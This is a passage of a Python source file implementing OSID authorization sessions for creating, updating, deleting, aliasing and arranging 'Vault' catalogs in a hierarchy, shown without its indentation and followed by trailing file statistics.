mappings to the ``Vault`` catalogs before deletion.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
_session_namespace = 'authorization.VaultAdminSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_admin_session()
self._forms = dict()
self._kwargs = kwargs
def can_create_vaults(self):
"""Tests if this user can create ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer create
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` creation is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_create_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_create_catalogs()
return True
@utilities.arguments_not_none
def can_create_vault_with_record_types(self, vault_record_types):
"""Tests if this user can create a single ``Vault`` using the desired record types.
While ``AuthorizationManager.getVaultRecordTypes()`` can be used
to examine which records are supported, this method tests which
record(s) are required for creating a specific ``Vault``.
Providing an empty array tests if a ``Vault`` can be created
with no records.
arg: vault_record_types (osid.type.Type[]): array of vault
record types
return: (boolean) - ``true`` if ``Vault`` creation using the
specified ``Types`` is supported, ``false`` otherwise
raise: NullArgument - ``vault_record_types`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_create_bin_with_record_types
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_create_catalog_with_record_types(catalog_record_types=vault_record_types)
return True
@utilities.arguments_not_none
def get_vault_form_for_create(self, vault_record_types):
"""Gets the vault form for creating new vaults.
A new form should be requested for each create transaction.
arg: vault_record_types (osid.type.Type[]): array of vault
record types
return: (osid.authorization.VaultForm) - the vault form
raise: NullArgument - ``vault_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form qith requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.get_bin_form_for_create_template
if self._catalog_session is not None:
return self._catalog_session.get_catalog_form_for_create(catalog_record_types=vault_record_types)
for arg in vault_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if vault_record_types == []:
result = objects.VaultForm(
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy) # Probably don't need effective agent id now that we have proxy in form.
else:
result = objects.VaultForm(
record_types=vault_record_types,
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy) # Probably don't need effective agent id now that we have proxy in form.
self._forms[result.get_id().get_identifier()] = not CREATED
return result
@utilities.arguments_not_none
def create_vault(self, vault_form):
"""Creates a new ``Vault``.
arg: vault_form (osid.authorization.VaultForm): the form for
this ``Vault``
return: (osid.authorization.Vault) - the new ``Vault``
raise: IllegalState - ``vault_form`` already used in a create
transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``vault_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_form`` did not originate from
``get_vault_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.create_bin_template
if self._catalog_session is not None:
return self._catalog_session.create_catalog(catalog_form=vault_form)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_form, ABCVaultForm):
raise errors.InvalidArgument('argument type is not an VaultForm')
if vault_form.is_for_update():
raise errors.InvalidArgument('the VaultForm is for update only, not create')
try:
if self._forms[vault_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('vault_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('vault_form did not originate from this session')
if not vault_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
insert_result = collection.insert_one(vault_form._my_map)
self._forms[vault_form.get_id().get_identifier()] = CREATED
result = objects.Vault(
osid_object_map=collection.find_one({'_id': insert_result.inserted_id}),
runtime=self._runtime,
proxy=self._proxy)
return result
def can_update_vaults(self):
"""Tests if this user can update ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer update
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` modification is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_update_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_update_catalogs()
return True
@utilities.arguments_not_none
def get_vault_form_for_update(self, vault_id):
"""Gets the vault form for updating an existing vault.
A new vault form should be requested for each update
transaction.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (osid.authorization.VaultForm) - the vault form
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.get_bin_form_for_update_template
if self._catalog_session is not None:
return self._catalog_session.get_catalog_form_for_update(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
result = collection.find_one({'_id': ObjectId(vault_id.get_identifier())})
cat_form = objects.VaultForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[cat_form.get_id().get_identifier()] = not UPDATED
return cat_form
@utilities.arguments_not_none
def update_vault(self, vault_form):
"""Updates an existing vault.
arg: vault_form (osid.authorization.VaultForm): the form
containing the elements to be updated
raise: IllegalState - ``vault_form`` already used in an update
transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``vault_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_form`` did not originate from
``get_vault_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.update_bin_template
if self._catalog_session is not None:
return self._catalog_session.update_catalog(catalog_form=vault_form)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_form, ABCVaultForm):
raise errors.InvalidArgument('argument type is not an VaultForm')
if not vault_form.is_for_update():
raise errors.InvalidArgument('the VaultForm is for update only, not create')
try:
if self._forms[vault_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('vault_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('vault_form did not originate from this session')
if not vault_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(vault_form._my_map) # save is deprecated - change to replace_one
self._forms[vault_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned
return objects.Vault(osid_object_map=vault_form._my_map, runtime=self._runtime, proxy=self._proxy)
def can_delete_vaults(self):
"""Tests if this user can delete vaults.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer delete
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_delete_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_delete_catalogs()
return True
@utilities.arguments_not_none
def delete_vault(self, vault_id):
"""Deletes a ``Vault``.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault`` to
remove
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.delete_bin_template
if self._catalog_session is not None:
return self._catalog_session.delete_catalog(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
for object_catalog in ['Authorization', 'Function', 'Qualifier', 'Vault']:
obj_collection = JSONClientValidated('authorization',
collection=object_catalog,
runtime=self._runtime)
if obj_collection.find({'assignedVaultIds': {'$in': [str(vault_id)]}}).count() != 0:
raise errors.IllegalState('catalog is not empty')
collection.delete_one({'_id': ObjectId(vault_id.get_identifier())})
def can_manage_vault_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Vault`` aliasing is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_vault(self, vault_id, alias_id):
"""Adds an ``Id`` to a ``Vault`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Vault`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another vault it is
reassigned to the given vault ``Id``.
arg: vault_id (osid.id.Id): the ``Id`` of a ``Vault``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``alias_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.alias_bin_template
if self._catalog_session is not None:
return self._catalog_session.alias_catalog(catalog_id=vault_id, alias_id=alias_id)
self._alias_id(primary_id=vault_id, equivalent_id=alias_id)
class VaultHierarchySession(abc_authorization_sessions.VaultHierarchySession, osid_sessions.OsidSession):
"""This session defines methods for traversing a hierarchy of ``Vault`` objects.
Each node in the hierarchy is a unique ``Vault``. The hierarchy may
be traversed recursively to establish the tree structure through
``get_parent_vaults()`` and ``getChildVaults()``. To relate these
``Ids`` to another OSID, ``get_vault_nodes()`` can be used for
retrievals that can be used for bulk lookups in other OSIDs. Any
``Vault`` available in the Authorization OSID is known to this
hierarchy but does not appear in the hierarchy traversal until added
as a root node or a child of another node.
A user may not be authorized to traverse the entire hierarchy. Parts
of the hierarchy may be made invisible through omission from the
returns of ``get_parent_vaults()`` or ``get_child_vaults()`` in lieu
of a ``PermissionDenied`` error that may disrupt the traversal
through authorized pathways.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: vault elements may be silently omitted or re-
ordered
* plenary view: provides a complete set or is an error condition
"""
_session_namespace = 'authorization.VaultHierarchySession'
def __init__(self, proxy=None, runtime=None, **kwargs):
# Implemented from template for
# osid.resource.BinHierarchySession.init_template
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
self._forms = dict()
self._kwargs = kwargs
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_hierarchy_session()
else:
hierarchy_mgr = self._get_provider_manager('HIERARCHY')
self._hierarchy_session = hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
Id(authority='AUTHORIZATION',
namespace='CATALOG',
identifier='VAULT'),
proxy=self._proxy)
def get_vault_hierarchy_id(self):
"""Gets the hierarchy ``Id`` associated with this session.
return: (osid.id.Id) - the hierarchy ``Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy_id
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy_id()
return self._hierarchy_session.get_hierarchy_id()
vault_hierarchy_id = property(fget=get_vault_hierarchy_id)
def get_vault_hierarchy(self):
"""Gets the hierarchy associated with this session.
return: (osid.hierarchy.Hierarchy) - the hierarchy associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy()
return self._hierarchy_session.get_hierarchy()
vault_hierarchy = property(fget=get_vault_hierarchy)
def can_access_vault_hierarchy(self):
"""Tests if this user can perform hierarchy queries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations.
return: (boolean) - ``false`` if hierarchy traversal methods are
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.can_access_bin_hierarchy
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_access_catalog_hierarchy()
return True
def use_comparative_vault_view(self):
"""The returns from the vault methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Hierarchy`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
def get_root_vault_ids(self):
"""Gets the root vault ``Ids`` in this hierarchy.
return: (osid.id.IdList) - the root vault ``Ids``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_root_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_root_catalog_ids()
return self._hierarchy_session.get_roots()
root_vault_ids = property(fget=get_root_vault_ids)
def get_root_vaults(self):
"""Gets the root vaults in this vault hierarchy.
return: (osid.authorization.VaultList) - the root vaults
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_root_bins
if self._catalog_session is not None:
return self._catalog_session.get_root_catalogs()
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(list(self.get_root_vault_ids()))
root_vaults = property(fget=get_root_vaults)
@utilities.arguments_not_none
def has_parent_vaults(self, vault_id):
"""Tests if the ``Vault`` has any parents.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (boolean) - ``true`` if the vault has parents, ``false``
otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.has_parent_bins
if self._catalog_session is not None:
return self._catalog_session.has_parent_catalogs(catalog_id=vault_id)
return self._hierarchy_session.has_parents(id_=vault_id)
@utilities.arguments_not_none
def is_parent_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is a direct parent of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if this ``id`` is a parent of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``id`` or ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_parent_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_parent_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_parent(id_=vault_id, parent_id=id_)
@utilities.arguments_not_none
def get_parent_vault_ids(self, vault_id):
"""Gets the parent ``Ids`` of the given vault.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (osid.id.IdList) - the parent ``Ids`` of the vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_parent_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_parent_catalog_ids(catalog_id=vault_id)
return self._hierarchy_session.get_parents(id_=vault_id)
@utilities.arguments_not_none
def get_parent_vaults(self, vault_id):
"""Gets the parents of the given vault.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (osid.authorization.VaultList) - the parents of the
vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_parent_bins
if self._catalog_session is not None:
return self._catalog_session.get_parent_catalogs(catalog_id=vault_id)
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(
list(self.get_parent_vault_ids(vault_id)))
@utilities.arguments_not_none
def is_ancestor_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is an ancestor of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if this ``id`` is an ancestor of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_ancestor_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_ancestor_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_ancestor(id_=id_, ancestor_id=vault_id)
@utilities.arguments_not_none
def has_child_vaults(self, vault_id):
"""Tests if a vault has any children.
arg: vault_id (osid.id.Id): a ``vault_id``
return: (boolean) - ``true`` if the ``vault_id`` has children,
``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.has_child_bins
if self._catalog_session is not None:
return self._catalog_session.has_child_catalogs(catalog_id=vault_id)
return self._hierarchy_session.has_children(id_=vault_id)
@utilities.arguments_not_none
def is_child_of_vault(self, id_, vault_id):
"""Tests if a vault is a direct child of another.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if the ``id`` is a child of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_child_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_child_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_child(id_=vault_id, child_id=id_)
@utilities.arguments_not_none
def get_child_vault_ids(self, vault_id):
"""Gets the child ``Ids`` of the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
return: (osid.id.IdList) - the children of the vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_child_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_child_catalog_ids(catalog_id=vault_id)
return self._hierarchy_session.get_children(id_=vault_id)
@utilities.arguments_not_none
def get_child_vaults(self, vault_id):
"""Gets the children of the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
return: (osid.authorization.VaultList) - the children of the
vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_child_bins
if self._catalog_session is not None:
return self._catalog_session.get_child_catalogs(catalog_id=vault_id)
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(
list(self.get_child_vault_ids(vault_id)))
@utilities.arguments_not_none
def is_descendant_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is a descendant of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if the ``id`` is a descendant of
the ``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` is not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_descendant_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_descendant_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_descendant(id_=id_, descendant_id=vault_id)
@utilities.arguments_not_none
def get_vault_node_ids(self, vault_id, ancestor_levels, descendant_levels, include_siblings):
"""Gets a portion of the hierarchy for the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
arg: ancestor_levels (cardinal): the maximum number of
ancestor levels to include. A value of 0 returns no
parents in the node.
arg: descendant_levels (cardinal): the maximum number of
descendant levels to include. A value of 0 returns no
children in the node.
arg: include_siblings (boolean): ``true`` to include the
siblings of the given node, ``false`` to omit the
siblings
return: (osid.hierarchy.Node) - a vault node
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_node_ids
if self._catalog_session is not None:
return self._catalog_session.get_catalog_node_ids(
catalog_id=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)
return self._hierarchy_session.get_nodes(
id_=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)
@utilities.arguments_not_none
def get_vault_nodes(self, vault_id, ancestor_levels, descendant_levels, include_siblings):
"""Gets a portion of the hierarchy for the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
arg: ancestor_levels (cardinal): the maximum number of
ancestor levels to include. A value of 0 returns no
parents in the node.
arg: descendant_levels (cardinal): the maximum number of
descendant levels to include. A value of 0 returns no
children in the node.
arg: include_siblings (boolean): ``true`` to include the
siblings of the given node, ``false`` to omit the
siblings
return: (osid.authorization.VaultNode) - a vault node
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_nodes
return objects.VaultNode(self.get_vault_node_ids(
vault_id=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)._my_map, runtime=self._runtime, proxy=self._proxy)
class VaultHierarchyDesignSession(abc_authorization_sessions.VaultHierarchyDesignSession, osid_sessions.OsidSession):
"""This session defines methods for managing a hierarchy of ``Vault`` objects.
Each node in the hierarchy is a unique ``Vault``.
"""
_session_namespace = 'authorization.VaultHierarchyDesignSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.init_template
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
self._forms = dict()
self._kwargs = kwargs
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_hierarchy_design_session()
else:
hierarchy_mgr = self._get_provider_manager('HIERARCHY')
self._hierarchy_session = hierarchy_mgr.get_hierarchy_design_session_for_hierarchy(
Id(authority='AUTHORIZATION',
namespace='CATALOG',
identifier='VAULT'),
proxy=self._proxy)
def get_vault_hierarchy_id(self):
"""Gets the hierarchy ``Id`` associated with this session.
return: (osid.id.Id) - the hierarchy ``Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy_id
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy_id()
return self._hierarchy_session.get_hierarchy_id()
vault_hierarchy_id = property(fget=get_vault_hierarchy_id)
def get_vault_hierarchy(self):
"""Gets the hierarchy associated with this session.
return: (osid.hierarchy.Hierarchy) - the hierarchy associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy()
return self._hierarchy_session.get_hierarchy()
vault_hierarchy = property(fget=get_vault_hierarchy)
def can_modify_vault_hierarchy(self):
"""Tests if this user can change the hierarchy.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known performing any update
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer these
operations to an unauthorized user.
return: (boolean) - ``false`` if changing this hierarchy is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.can_modify_bin_hierarchy_template
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_modify_catalog_hierarchy()
return True
@utilities.arguments_not_none
def add_root_vault(self, vault_id):
"""Adds a root vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: AlreadyExists - ``vault_id`` is already in hierarchy
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.add_root_bin_template
if self._catalog_session is not None:
return self._catalog_session.add_root_catalog(catalog_id=vault_id)
return self._hierarchy_session.add_root(id_=vault_id)
@utilities.arguments_not_none
def remove_root_vault(self, vault_id):
"""Removes a root vault from this hierarchy.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: NotFound - ``vault_id`` not a parent of ``child_id``
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_root_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_root_catalog(catalog_id=vault_id)
return self._hierarchy_session.remove_root(id_=vault_id)
@utilities.arguments_not_none
def add_child_vault(self, vault_id, child_id):
"""Adds a child to a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
arg: child_id (osid.id.Id): the ``Id`` of the new child
raise: AlreadyExists - ``vault_id`` is already a parent of
``child_id``
raise: NotFound - ``vault_id`` or ``child_id`` not found
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.add_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.add_child_catalog(catalog_id=vault_id, child_id=child_id)
return self._hierarchy_session.add_child(id_=vault_id, child_id=child_id)
@utilities.arguments_not_none
def remove_child_vault(self, vault_id, child_id):
"""Removes a child from a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
arg: child_id (osid.id.Id): the ``Id`` of the child
raise: NotFound - ``vault_id`` not parent of ``child_id``
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_child_catalog(catalog_id=vault_id, child_id=child_id)
return self._hierarchy_session.remove_child(id_=vault_id, child_id=child_id)
@utilities.arguments_not_none
def remove_child_vaults(self, vault_id):
"""Removes all children from a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: NotFound - ``vault_id`` is not in hierarchy
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_child_catalogs(catalog_id=vault_id)
return self._hierarchy_session.remove_children(id_=vault_id)
| 45.960684 | 186 | 0.654709 | 159,782 | 0.990454 | 0 | 0 | 102,051 | 0.632592 | 0 | 0 | 105,793 | 0.655788 |
